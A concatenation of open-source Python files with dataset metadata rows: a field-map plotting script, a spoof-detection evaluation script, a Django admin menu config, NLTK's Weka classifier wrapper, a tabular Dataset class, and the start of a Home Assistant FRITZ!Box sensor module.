SerebryakovMA/quelea
|
4bac70d60852a454ad6533d08a02e018c75dc377
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import sys
sys.path.append("../")
from quelea import *
nx = 217
ny = 133
x0 = 0
x1 = 30 # lambdas
y0 = 0
y1 = 20 # lambdas
xs = np.linspace(x0, x1, nx)
ys = np.linspace(y0, y1, ny)
# 2d array of (x, y, z, t)
coords = np.array( [ [x, y, 0, 0] for x in xs for y in ys ] )
# for map_fields function this should be converted from 2D to 1D array
coords = coords.reshape((4 * nx * ny,))
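# e.g. with nx = 217 and ny = 133 as above, the reshape flattens
# (217 * 133, 4) == (28861, 4) into (4 * 217 * 133,) == (115444,)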
ftype = 1 # plane wave
a0 = 1 # normalized field amplitude
omega = 1 # frequency
fparam = [a0, 1, 0, 0, 0, 1, 0, 0, omega] # parameters of the plane wave
ex, ey, ez, bx, by, bz = map_fields(coords, ftype, fparam)
# now convert to 2d arrays
ex = ex.reshape((nx, ny))
ey = ey.reshape((nx, ny))
ez = ez.reshape((nx, ny))
bx = bx.reshape((nx, ny))
by = by.reshape((nx, ny))
bz = bz.reshape((nx, ny))
ex = ex.transpose()
ey = ey.transpose()
ez = ez.transpose()
bx = bx.transpose()
by = by.transpose()
bz = bz.transpose()
plt.imshow(ey, cmap = 'RdYlBu', origin = 'lower', extent = [x0, x1, y0, y1])
plt.colorbar()
plt.clim(-a0, a0)
plt.savefig("map_fields.pdf")
| 21.882353
| 76
| 0.641577
| 200
| 1,116
| 3.565
| 0.405
| 0.039271
| 0.092567
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.049945
| 0.192652
| 1,116
| 50
| 77
| 22.32
| 0.741398
| 0.189068
| 0
| 0
| 0
| 0
| 0.03132
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.135135
| 0
| 0.135135
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86981ef4c2dc9e662bd6493203efcef25a7c5284
| 4,709
|
py
|
Python
|
test.py
|
t-kaichi/hyperspoof
|
6effdf03be8489ba74154a12416c69948681aa51
|
[
"MIT"
] | 10
|
2021-06-23T09:42:30.000Z
|
2022-03-31T22:26:17.000Z
|
test.py
|
t-kaichi/hyperspoof
|
6effdf03be8489ba74154a12416c69948681aa51
|
[
"MIT"
] | null | null | null |
test.py
|
t-kaichi/hyperspoof
|
6effdf03be8489ba74154a12416c69948681aa51
|
[
"MIT"
] | null | null | null |
import os
from absl import app
from absl import flags
import numpy as np
import tqdm
from tensorflow.keras import Model
from albumentations import (
Compose, HorizontalFlip, RandomBrightness,RandomContrast,
ShiftScaleRotate, ToFloat, VerticalFlip)
from utils import reset_tf
from eval_utils import calc_score_variance
from models import build_seg_model, build_pixel_mlp_class_model
from VegetableSequence import VegetableDataset, VegetableSequence
from temporal_random_seed import TemporalRandomSeed
import myFlags
FLAGS = flags.FLAGS
def main(argv):
reset_tf(FLAGS.device)
ds_info = VegetableDataset(FLAGS.data_path)
dim = ds_info.hsi_dims
cats = ds_info.get_categories()
# spoof file path
assert FLAGS.spoof_type == "print" or FLAGS.spoof_type == "replay"
spooffn = "224_224.m.rf.npy"
spoofdir = '03' if FLAGS.spoof_type == 'print' else '04' # "04": replay
spooffns = [os.path.join(ds_info.DATASET_ROOT_PATH, str(i).zfill(2),
"05", spoofdir, spooffn) for i in cats]
# dataset generation
input_shape = (224, 224, dim)
AUGMENTATIONS_ALL = Compose([
HorizontalFlip(p=0.5),
VerticalFlip(p=0.2),
RandomContrast(limit=0.001, p=0.5),
RandomBrightness(limit=0.001, p=0.5),
ShiftScaleRotate(
shift_limit=0.3, scale_limit=0.9,
rotate_limit=30, border_mode=4, p=0.8),# cv2.BORDER_REFLECT_101
ToFloat(max_value=1024)
])
AUGMENTATIONS_SIMPLE = Compose([
ToFloat(max_value=1024)
])
test_aug_gen = VegetableSequence(dataset=ds_info, instance_ids=[5],
sample_ids=[1,2], random_state=2, batch_size=32,
augmentations=AUGMENTATIONS_ALL, isTest=True)
# build and load models
print("building model")
nb_classes = ds_info.object_categories
seg_model = build_seg_model(input_shape=input_shape)
seg_model.load_weights(FLAGS.seg_model)
pix_class_model = build_pixel_mlp_class_model(
nb_classes=nb_classes, input_shape=(1,dim))
pix_class_model.load_weights(FLAGS.class_model)
penultimate_feat_extractor = Model(inputs=pix_class_model.input,
outputs=pix_class_model.get_layer("penultimate").output)
def predict_pixel_merge(xs):
_xs_seg = np.argmax(seg_model.predict(xs), axis=-1)
assert len(_xs_seg) == len(xs)
_var_fs = [] # variance of the penultimate features
for i in range(len(xs)):
_x = xs[i]
_x_seg = _xs_seg[i]
_x_pixels = _x[_x_seg > 0]
_x_pixels = _x_pixels[:, np.newaxis, :]
_f_pixels = penultimate_feat_extractor.predict(_x_pixels,
batch_size=224*224*dim).reshape(-1, FLAGS.penultimate_nodes)
_var_f = np.sum(np.var(_f_pixels, axis=0))
_var_fs.append(_var_f)
return _var_fs
predict_func = predict_pixel_merge
var_fs = []
true_labels = []
# process live images
for i in tqdm.trange(FLAGS.live_augs, desc="live augmentations"):
for batch in tqdm.tqdm(test_aug_gen, desc="live augmentations batch"):
xs, ys = batch
var_f = predict_func(xs)
var_fs.extend(var_f)
true_labels.extend(np.argmax(ys, axis=1))
# process spoof images
with TemporalRandomSeed(2021):
for fn in tqdm.tqdm(spooffns, desc="spoofs"):
x = np.load(fn).astype("uint16")
xs_aug = np.array([AUGMENTATIONS_ALL(image=x)["image"]
for i in range(FLAGS.spoof_augs)])
var_f = predict_func(xs_aug)
var_fs.extend(var_f)
true_labels.extend([10000] * FLAGS.spoof_augs) # spoof label: 10000
# calculate accuracy
true_labels = np.array(true_labels)
var_fs = np.array(var_fs)
bin_labels, uncertainties, results = calc_score_variance(true_labels, var_fs)
# save results
expr_name = parentdirname(FLAGS.class_model)
save_result_cache(expr_name, bin_labels, uncertainties, results)
return 0
def save_result_cache(expr_name, labels, uncertainties, results):
dn = os.path.join(FLAGS.out_path, expr_name)
os.makedirs(dn, exist_ok=True)
np.save(os.path.join(dn, "binary_labels.npy"), labels)
np.save(os.path.join(dn, "uncertainties.npy"), uncertainties)
with open(os.path.join(dn, "results.txt"), "w") as f:
for i, result in enumerate(["TNR95: ", "Detection acc.: ", "ROC: "]):
f.write(result + str(results[i]) + "\n")
print("saved to " + dn)
def parentdirname(path):
return os.path.basename(os.path.dirname(path))
if __name__ == "__main__":
app.run(main)
| 36.503876
| 84
| 0.660437
| 641
| 4,709
| 4.586583
| 0.330733
| 0.015306
| 0.017007
| 0.012245
| 0.087755
| 0.060544
| 0.021088
| 0.021088
| 0
| 0
| 0
| 0.026272
| 0.232109
| 4,709
| 129
| 85
| 36.503876
| 0.786781
| 0.046931
| 0
| 0.058824
| 0
| 0
| 0.04847
| 0
| 0
| 0
| 0
| 0
| 0.019608
| 1
| 0.039216
| false
| 0
| 0.127451
| 0.009804
| 0.196078
| 0.039216
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8698961278b2541aa172b54c8053ea36ceff0d54
| 4,612
|
py
|
Python
|
generator/apps.py
|
TheJacksonLaboratory/jaxid_generator
|
be5222d9c5ce57a169b94b0afd1ae9f7f10a66c1
|
[
"Apache-2.0"
] | 2
|
2020-10-19T17:21:09.000Z
|
2020-10-20T14:27:25.000Z
|
generator/apps.py
|
cometsong/jaxid_generator
|
be5222d9c5ce57a169b94b0afd1ae9f7f10a66c1
|
[
"Apache-2.0"
] | null | null | null |
generator/apps.py
|
cometsong/jaxid_generator
|
be5222d9c5ce57a169b94b0afd1ae9f7f10a66c1
|
[
"Apache-2.0"
] | null | null | null |
from django.conf import settings
from suit import apps
from suit.apps import DjangoSuitConfig
from suit.menu import ParentItem, ChildItem
APP_NAME = settings.APP_NAME
WIKI_URL = settings.WIKI_URL
class SuitConfig(DjangoSuitConfig):
name = 'suit'
verbose_name = 'Mbiome Core JAXid Generator'
site_title = 'Mbiome Core JAXid Tracking'
site_header = site_title
index_title = verbose_name
layout = 'vertical'
list_per_page = 35
# header_date_format = 'l, d-M-o'
# header_time_format = 'H:i e'
menu = (
ParentItem('JAX Id Record Lists',
use_first_child_url=True,
url='',
children=[
ChildItem('JAXid Records', model='id_generate.jaxiddetail'),
ChildItem(model='id_generate.boxid'),
ChildItem(model='id_generate.plateid'),
],
icon='fa fa-list-ul'),
ParentItem('Reference Data',
use_first_child_url=True,
url='',
children=[
ChildItem(model='id_generate.projectcode'),
ChildItem(model='id_generate.nucleicacidtype'),
ChildItem(model='id_generate.sampletype'),
ChildItem(model='id_generate.sequencingtype'),
],
icon='fa fa-list'),
ParentItem(
label="Generate new JAXid's",
url=f'/{APP_NAME}/manage/id_generate/jaxiddetail/import/',
permissions='id_generate.change_jaxiddetail',
icon='fa fa-rocket'),
ParentItem(
label="Generate new Box ID's",
url=f'/{APP_NAME}/manage/id_generate/boxid/import/',
permissions='id_generate.change_boxid',
icon='fa fa-cube'),
ParentItem(
label="Generate new Plate ID's",
url=f'/{APP_NAME}/manage/id_generate/plateid/import/',
permissions='id_generate.change_plateid',
icon='fa fa-circle-o-notch'),
ParentItem(
label='Authorization',
children=[
ChildItem('Staff', model='auth.user'),
ChildItem(model='auth.group'),
ChildItem(model='admin.logentry'),
],
icon='fa fa-user-circle'),
ParentItem(
label='SOP and Request Sheet',
use_first_child_url=False,
url='',
children=[
ChildItem('View JAX ID Request SOP',
target_blank=True,
url=f'{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx'),
ChildItem('View JAX ID Request Template Sheet',
url=f'{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx'),
],
icon='fa fa-file'),
)
# menu_handler = None
menu_show_home = False
# Show changelist top actions only if any row is selected
toggle_changelist_top_actions = False
# # Enables two column layout for change forms with submit row on the right
form_submit_on_right = False
# Hide name/"original" column for all tabular inlines.
# May be overridden in Inline class by suit_form_inlines_hide_original = False
#form_inlines_hide_original = False
form_size = {
'default': apps.SUIT_FORM_SIZE_LARGE,
'widgets': {
'AutosizedTextarea': apps.SUIT_FORM_SIZE_X_LARGE,
'Textarea': apps.SUIT_FORM_SIZE_X_LARGE,
},
}
# form_size setting can be overridden in ModelAdmin using suit_form_size parameter
#
# Example:
# ----------------------------------------------
# suit_form_size = {
# 'default': 'col-xs-12 col-sm-2', 'col-xs-12 col-sm-10',
# 'fields': {
# 'field_name': SUIT_FORM_SIZE_LARGE,
# 'field_name2': SUIT_FORM_SIZE_X_LARGE,
# },
# 'widgets': {
# 'widget_class_name': SUIT_FORM_SIZE_FULL,
# 'AdminTextareaWidget': SUIT_FORM_SIZE_FULL,
# },
# 'fieldsets': {
# 'fieldset_name': SUIT_FORM_SIZE_FULL,
# 'fieldset_name2': SUIT_FORM_SIZE_FULL,
# }
# }
| 37.803279
| 198
| 0.550954
| 481
| 4,612
| 5.064449
| 0.370062
| 0.053366
| 0.054187
| 0.059113
| 0.245895
| 0.151067
| 0.108374
| 0.108374
| 0.024631
| 0
| 0
| 0.011792
| 0.338031
| 4,612
| 121
| 199
| 38.115702
| 0.786112
| 0.208803
| 0
| 0.225
| 0
| 0.025
| 0.305249
| 0.152762
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0875
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869a42d471e5a0264cf98babfcdd88a6669b3cbc
| 12,970
|
py
|
Python
|
pkgs/nltk-3.2-py27_0/lib/python2.7/site-packages/nltk/classify/weka.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
pkgs/nltk-3.2-py27_0/lib/python2.7/site-packages/nltk/classify/weka.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
pkgs/nltk-3.2-py27_0/lib/python2.7/site-packages/nltk/classify/weka.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# Natural Language Toolkit: Interface to Weka Classifiers
#
# Copyright (C) 2001-2015 NLTK Project
# Author: Edward Loper <edloper@gmail.com>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
Classifiers that make use of the external 'Weka' package.
"""
from __future__ import print_function
import time
import tempfile
import os
import subprocess
import re
import zipfile
from sys import stdin
from nltk import compat
from nltk.probability import DictionaryProbDist
from nltk.internals import java, config_java
from nltk.classify.api import ClassifierI
_weka_classpath = None
_weka_search = ['.',
'/usr/share/weka',
'/usr/local/share/weka',
'/usr/lib/weka',
'/usr/local/lib/weka',]
def config_weka(classpath=None):
global _weka_classpath
# Make sure java's configured first.
config_java()
if classpath is not None:
_weka_classpath = classpath
if _weka_classpath is None:
searchpath = _weka_search
if 'WEKAHOME' in os.environ:
searchpath.insert(0, os.environ['WEKAHOME'])
for path in searchpath:
if os.path.exists(os.path.join(path, 'weka.jar')):
_weka_classpath = os.path.join(path, 'weka.jar')
version = _check_weka_version(_weka_classpath)
if version:
print(('[Found Weka: %s (version %s)]' %
(_weka_classpath, version)))
else:
print('[Found Weka: %s]' % _weka_classpath)
_check_weka_version(_weka_classpath)
if _weka_classpath is None:
raise LookupError('Unable to find weka.jar! Use config_weka() '
'or set the WEKAHOME environment variable. '
'For more information about Weka, please see '
'http://www.cs.waikato.ac.nz/ml/weka/')
def _check_weka_version(jar):
try:
zf = zipfile.ZipFile(jar)
except (SystemExit, KeyboardInterrupt):
raise
except:
return None
try:
try:
return zf.read('weka/core/version.txt')
except KeyError:
return None
finally:
zf.close()
class WekaClassifier(ClassifierI):
def __init__(self, formatter, model_filename):
self._formatter = formatter
self._model = model_filename
def prob_classify_many(self, featuresets):
return self._classify_many(featuresets, ['-p', '0', '-distribution'])
def classify_many(self, featuresets):
return self._classify_many(featuresets, ['-p', '0'])
def _classify_many(self, featuresets, options):
# Make sure we can find java & weka.
config_weka()
temp_dir = tempfile.mkdtemp()
try:
# Write the test data file.
test_filename = os.path.join(temp_dir, 'test.arff')
self._formatter.write(test_filename, featuresets)
# Call weka to classify the data.
cmd = ['weka.classifiers.bayes.NaiveBayes',
'-l', self._model, '-T', test_filename] + options
(stdout, stderr) = java(cmd, classpath=_weka_classpath,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Check if something went wrong:
if stderr and not stdout:
if 'Illegal options: -distribution' in stderr:
raise ValueError('The installed version of weka does '
'not support probability distribution '
'output.')
else:
raise ValueError('Weka failed to generate output:\n%s'
% stderr)
# Parse weka's output.
return self.parse_weka_output(stdout.decode(stdin.encoding).split('\n'))
finally:
for f in os.listdir(temp_dir):
os.remove(os.path.join(temp_dir, f))
os.rmdir(temp_dir)
def parse_weka_distribution(self, s):
probs = [float(v) for v in re.split('[*,]+', s) if v.strip()]
probs = dict(zip(self._formatter.labels(), probs))
return DictionaryProbDist(probs)
def parse_weka_output(self, lines):
# Strip unwanted text from stdout
for i,line in enumerate(lines):
if line.strip().startswith("inst#"):
lines = lines[i:]
break
if lines[0].split() == ['inst#', 'actual', 'predicted',
'error', 'prediction']:
return [line.split()[2].split(':')[1]
for line in lines[1:] if line.strip()]
elif lines[0].split() == ['inst#', 'actual', 'predicted',
'error', 'distribution']:
return [self.parse_weka_distribution(line.split()[-1])
for line in lines[1:] if line.strip()]
# is this safe:?
elif re.match(r'^0 \w+ [01]\.[0-9]* \?\s*$', lines[0]):
return [line.split()[1] for line in lines if line.strip()]
else:
for line in lines[:10]:
print(line)
raise ValueError('Unhandled output format -- your version '
'of weka may not be supported.\n'
' Header: %s' % lines[0])
# [xx] full list of classifiers (some may be abstract?):
# ADTree, AODE, BayesNet, ComplementNaiveBayes, ConjunctiveRule,
# DecisionStump, DecisionTable, HyperPipes, IB1, IBk, Id3, J48,
# JRip, KStar, LBR, LeastMedSq, LinearRegression, LMT, Logistic,
# LogisticBase, M5Base, MultilayerPerceptron,
# MultipleClassifiersCombiner, NaiveBayes, NaiveBayesMultinomial,
# NaiveBayesSimple, NBTree, NNge, OneR, PaceRegression, PART,
# PreConstructedLinearModel, Prism, RandomForest,
# RandomizableClassifier, RandomTree, RBFNetwork, REPTree, Ridor,
# RuleNode, SimpleLinearRegression, SimpleLogistic,
# SingleClassifierEnhancer, SMO, SMOreg, UserClassifier, VFI,
# VotedPerceptron, Winnow, ZeroR
_CLASSIFIER_CLASS = {
'naivebayes': 'weka.classifiers.bayes.NaiveBayes',
'C4.5': 'weka.classifiers.trees.J48',
'log_regression': 'weka.classifiers.functions.Logistic',
'svm': 'weka.classifiers.functions.SMO',
'kstar': 'weka.classifiers.lazy.KStar',
'ripper': 'weka.classifiers.rules.JRip',
}
@classmethod
def train(cls, model_filename, featuresets,
classifier='naivebayes', options=[], quiet=True):
# Make sure we can find java & weka.
config_weka()
# Build an ARFF formatter.
formatter = ARFF_Formatter.from_train(featuresets)
temp_dir = tempfile.mkdtemp()
try:
# Write the training data file.
train_filename = os.path.join(temp_dir, 'train.arff')
formatter.write(train_filename, featuresets)
if classifier in cls._CLASSIFIER_CLASS:
javaclass = cls._CLASSIFIER_CLASS[classifier]
elif classifier in cls._CLASSIFIER_CLASS.values():
javaclass = classifier
else:
raise ValueError('Unknown classifier %s' % classifier)
# Train the weka model.
cmd = [javaclass, '-d', model_filename, '-t', train_filename]
cmd += list(options)
if quiet:
stdout = subprocess.PIPE
else: stdout = None
java(cmd, classpath=_weka_classpath, stdout=stdout)
# Return the new classifier.
return WekaClassifier(formatter, model_filename)
finally:
for f in os.listdir(temp_dir):
os.remove(os.path.join(temp_dir, f))
os.rmdir(temp_dir)
class ARFF_Formatter:
"""
Converts featuresets and labeled featuresets to ARFF-formatted
strings, appropriate for input into Weka.
Features and classes can be specified manually in the constructor, or may
be determined from data using ``from_train``.
"""
def __init__(self, labels, features):
"""
:param labels: A list of all class labels that can be generated.
:param features: A list of feature specifications, where
each feature specification is a tuple (fname, ftype);
and ftype is an ARFF type string such as NUMERIC or
STRING.
"""
self._labels = labels
self._features = features
def format(self, tokens):
"""Returns a string representation of ARFF output for the given data."""
return self.header_section() + self.data_section(tokens)
def labels(self):
"""Returns the list of classes."""
return list(self._labels)
def write(self, outfile, tokens):
"""Writes ARFF data to a file for the given data."""
if not hasattr(outfile, 'write'):
outfile = open(outfile, 'w')
outfile.write(self.format(tokens))
outfile.close()
@staticmethod
def from_train(tokens):
"""
Constructs an ARFF_Formatter instance with class labels and feature
types determined from the given data. Handles boolean, numeric and
string (note: not nominal) types.
"""
# Find the set of all attested labels.
labels = set(label for (tok, label) in tokens)
# Determine the types of all features.
features = {}
for tok, label in tokens:
for (fname, fval) in tok.items():
if issubclass(type(fval), bool):
ftype = '{True, False}'
elif issubclass(type(fval), (compat.integer_types, float, bool)):
ftype = 'NUMERIC'
elif issubclass(type(fval), compat.string_types):
ftype = 'STRING'
elif fval is None:
continue # can't tell the type.
else:
raise ValueError('Unsupported value type %r' % fval)
if features.get(fname, ftype) != ftype:
raise ValueError('Inconsistent type for %s' % fname)
features[fname] = ftype
features = sorted(features.items())
return ARFF_Formatter(labels, features)
def header_section(self):
"""Returns an ARFF header as a string."""
# Header comment.
s = ('% Weka ARFF file\n' +
'% Generated automatically by NLTK\n' +
'%% %s\n\n' % time.ctime())
# Relation name
s += '@RELATION rel\n\n'
# Input attribute specifications
for fname, ftype in self._features:
s += '@ATTRIBUTE %-30r %s\n' % (fname, ftype)
# Label attribute specification
s += '@ATTRIBUTE %-30r {%s}\n' % ('-label-', ','.join(self._labels))
return s
def data_section(self, tokens, labeled=None):
"""
Returns the ARFF data section for the given data.
:param tokens: a list of featuresets (dicts) or labelled featuresets
which are tuples (featureset, label).
:param labeled: Indicates whether the given tokens are labeled
or not. If None, then the tokens will be assumed to be
labeled if the first token's value is a tuple or list.
"""
# Check if the tokens are labeled or unlabeled. If unlabeled,
# then use 'None'
if labeled is None:
labeled = tokens and isinstance(tokens[0], (tuple, list))
if not labeled:
tokens = [(tok, None) for tok in tokens]
# Data section
s = '\n@DATA\n'
for (tok, label) in tokens:
for fname, ftype in self._features:
s += '%s,' % self._fmt_arff_val(tok.get(fname))
s += '%s\n' % self._fmt_arff_val(label)
return s
def _fmt_arff_val(self, fval):
if fval is None:
return '?'
elif isinstance(fval, (bool, compat.integer_types)):
return '%s' % fval
elif isinstance(fval, float):
return '%r' % fval
else:
return '%r' % fval
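# Hedged usage sketch (the featuresets are hypothetical; label order in the
# header depends on set iteration order):
#     fmt = ARFF_Formatter.from_train([({'cap': True, 'len': 4}, 'yes'),
#                                      ({'cap': False, 'len': 2}, 'no')])
#     print(fmt.format([({'cap': True, 'len': 4}, 'yes')]))
# which yields something along the lines of
#     @RELATION rel
#     @ATTRIBUTE 'cap'                           {True, False}
#     @ATTRIBUTE 'len'                           NUMERIC
#     @ATTRIBUTE '-label-'                       {yes,no}
#     @DATA
#     True,4,'yes'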
if __name__ == '__main__':
from nltk.classify.util import names_demo, binary_names_demo_features
def make_classifier(featuresets):
return WekaClassifier.train('/tmp/name.model', featuresets,
'C4.5')
classifier = names_demo(make_classifier, binary_names_demo_features)
| 37.485549
| 85
| 0.562606
| 1,395
| 12,970
| 5.119713
| 0.273118
| 0.023663
| 0.008401
| 0.007841
| 0.158499
| 0.130916
| 0.092691
| 0.055447
| 0.055447
| 0.045645
| 0
| 0.005129
| 0.338551
| 12,970
| 345
| 86
| 37.594203
| 0.827369
| 0.210486
| 0
| 0.166667
| 0
| 0
| 0.130976
| 0.026237
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.060185
| 0.013889
| 0.25463
| 0.018519
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869a8a31a260884a519f22c5d9a29b22876f051f
| 5,502
|
py
|
Python
|
src/si/data/dataset.py
|
pg428/SIB
|
b887c2011eb3a04d119a93b3932785d182e331d3
|
[
"Apache-2.0"
] | null | null | null |
src/si/data/dataset.py
|
pg428/SIB
|
b887c2011eb3a04d119a93b3932785d182e331d3
|
[
"Apache-2.0"
] | null | null | null |
src/si/data/dataset.py
|
pg428/SIB
|
b887c2011eb3a04d119a93b3932785d182e331d3
|
[
"Apache-2.0"
] | null | null | null |
import pandas as pd
import numpy as np
from src.si.util.util import label_gen
__all__ = ['Dataset']
class Dataset:
def __init__(self, X=None, Y=None,
xnames: list = None,
yname: str = None):
""" Tabular Dataset"""
if X is None:
raise Exception("Trying to instanciate a DataSet without any data")
self.X = X
self.Y = Y
self.xnames = xnames if xnames else label_gen(X.shape[1])
self.yname = yname if yname else 'Y'
@classmethod
def from_data(cls, filename, sep=",", labeled=True):
"""Creates a DataSet from a data file.
:param filename: The filename
:type filename: str
:param sep: attributes separator, defaults to ","
:type sep: str, optional
:return: A DataSet object
:rtype: DataSet
"""
data = np.genfromtxt(filename, delimiter=sep)
if labeled:
X = data[:, 0:-1]
Y = data[:, -1]
else:
X = data
Y = None
return cls(X, Y)
@classmethod
def from_dataframe(cls, df, ylabel=None):
"""Creates a DataSet from a pandas dataframe.
:param df: [description]
:type df: [type]
:param ylabel: [description], defaults to None
:type ylabel: [type], optional
:return: [description]
:rtype: [type]
"""
if ylabel and ylabel in df.columns:
X = df.loc[:, df.columns != ylabel].to_numpy() # convert to a numpy array
Y = df.loc[:, ylabel].to_numpy()
# xnames = df.columns.tolist().remove(ylabel)
yname = ylabel
xnames = df.columns.tolist()
for name in xnames:
if name == yname:
xnames.remove(yname)
else:
X = df.to_numpy()
Y = None
xnames = df.columns.tolist()
yname = None
return cls(X, Y, xnames, yname)
def __len__(self):
"""Returns the number of data points."""
return self.X.shape[0]
def hasLabel(self):
"""Returns True if the dataset constains labels (a dependent variable)"""
return self.Y is not None
def getNumFeatures(self):
"""Returns the number of features"""
return self.X.shape[1]
def getNumClasses(self):
"""Returns the number of label classes or 0 if the dataset has no dependent variable."""
return len(np.unique(self.Y)) if self.hasLabel() else 0
def writeDataset(self, filename, sep=","):
"""Saves the dataset to a file
:param filename: The output file path
:type filename: str
:param sep: The fields separator, defaults to ","
:type sep: str, optional
"""
fullds = np.hstack((self.X, self.Y.reshape(len(self.Y), 1)))
np.savetxt(filename, fullds, delimiter=sep)
def toDataframe(self):
""" Converts the dataset into a pandas DataFrame"""
if self.hasLabel():
df = pd.DataFrame(np.hstack((self.X, self.Y.reshape(len(self.Y), 1))), columns=self.xnames[:]+[self.yname]) #columns=np.hstack((self.xnames, self.yname)))
else:
df = pd.DataFrame(self.X.copy(), columns=self.xnames[:])
return df
def getXy(self):
return self.X, self.Y
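# Hedged usage sketch (the dataframe is hypothetical):
#     import pandas as pd
#     df = pd.DataFrame({'a': [1.0, 2.0], 'b': [3.0, 4.0], 'y': [0, 1]})
#     ds = Dataset.from_dataframe(df, ylabel='y')
#     ds.getNumFeatures()   # -> 2
#     ds.hasLabel()         # -> True
#     summary(ds)           # per-column mean/var/max/min as a DataFrame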
def summary(dataset, format='df'):
""" Returns the statistics of a dataset(mean, std, max, min)
:param dataset: A Dataset object
:type dataset: si.data.Dataset
:param format: Output format ('df':DataFrame, 'dict':dictionary ), defaults to 'df'
:type format: str, optional
"""
if format not in ["df", "dict"]:
raise Exception("Invalid format. Choose between 'df' and 'dict'.")
if dataset.hasLabel():
data = np.hstack((dataset.X, dataset.Y.reshape(len(dataset.Y), 1)))
#data = np.hstack([dataset.X, np.reshape(dataset.Y, (-1, 1))])
columns = dataset.xnames[:] + [dataset.yname]
else:
data = dataset.X
columns = dataset.xnames[:]
stats = {}
# string labels cannot be averaged, so skip the label column in that case
if dataset.hasLabel() and isinstance(dataset.Y[0], str):
n_cols = data.shape[1] - 1
else:
n_cols = data.shape[1]
for i in range(n_cols): # iterate over columns
_means = np.mean(data[:, i], axis=0)
_vars = np.var(data[:, i], axis=0)
_maxs = np.max(data[:, i], axis=0)
_mins = np.min(data[:, i], axis=0)
stat = {"mean": _means,
"var": _vars,
"max": _maxs,
"min": _mins
}
stats[columns[i]] = stat
# _means = np.mean(data, axis=0)
# _vars = np.var(data, axis=0)
# _maxs = np.max(data, axis=0)
# _mins = np.min(data, axis=0)
# stats = {}
# for i in range(data.shape[1]):
# stat = {"mean": _means[i],
# "var": _vars[i],
# "max": _maxs[i],
# "min": _mins[i]
# }
# stats[columns[i]] = stat
if format == "dict":
return stats
else:
return pd.DataFrame(stats)
| 32.364706
| 166
| 0.526172
| 683
| 5,502
| 4.175695
| 0.196193
| 0.021038
| 0.025245
| 0.02805
| 0.265778
| 0.187938
| 0.169004
| 0.121318
| 0.121318
| 0.121318
| 0
| 0.008242
| 0.338422
| 5,502
| 169
| 167
| 32.556213
| 0.775275
| 0.290622
| 0
| 0.309278
| 0
| 0
| 0.039114
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.113402
| false
| 0
| 0.030928
| 0.010309
| 0.257732
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869e135c2c869c0e98bb08d38ef8fc9d0c3c1530
| 11,744
|
py
|
Python
|
homeassistant/components/fritz/sensor.py
|
EuleMitKeule/core
|
3af54d96c7dcc3f7087d1196e6ab0db029301ee7
|
[
"Apache-2.0"
] | 3
|
2022-02-18T14:03:39.000Z
|
2022-03-26T20:26:55.000Z
|
homeassistant/components/fritz/sensor.py
|
EuleMitKeule/core
|
3af54d96c7dcc3f7087d1196e6ab0db029301ee7
|
[
"Apache-2.0"
] | 74
|
2020-08-05T07:20:27.000Z
|
2022-03-23T12:47:28.000Z
|
homeassistant/components/fritz/sensor.py
|
marecabo/home-assistant
|
e33774a61e7fcc88aff752dfa4618dd26a746872
|
[
"Apache-2.0"
] | 2
|
2020-06-06T21:55:32.000Z
|
2022-03-06T04:18:21.000Z
|
"""AVM FRITZ!Box binary sensors."""
from __future__ import annotations
from collections.abc import Callable
from dataclasses import dataclass
from datetime import datetime, timedelta
import logging
from typing import Any, Literal
from fritzconnection.core.exceptions import (
FritzActionError,
FritzActionFailedError,
FritzConnectionException,
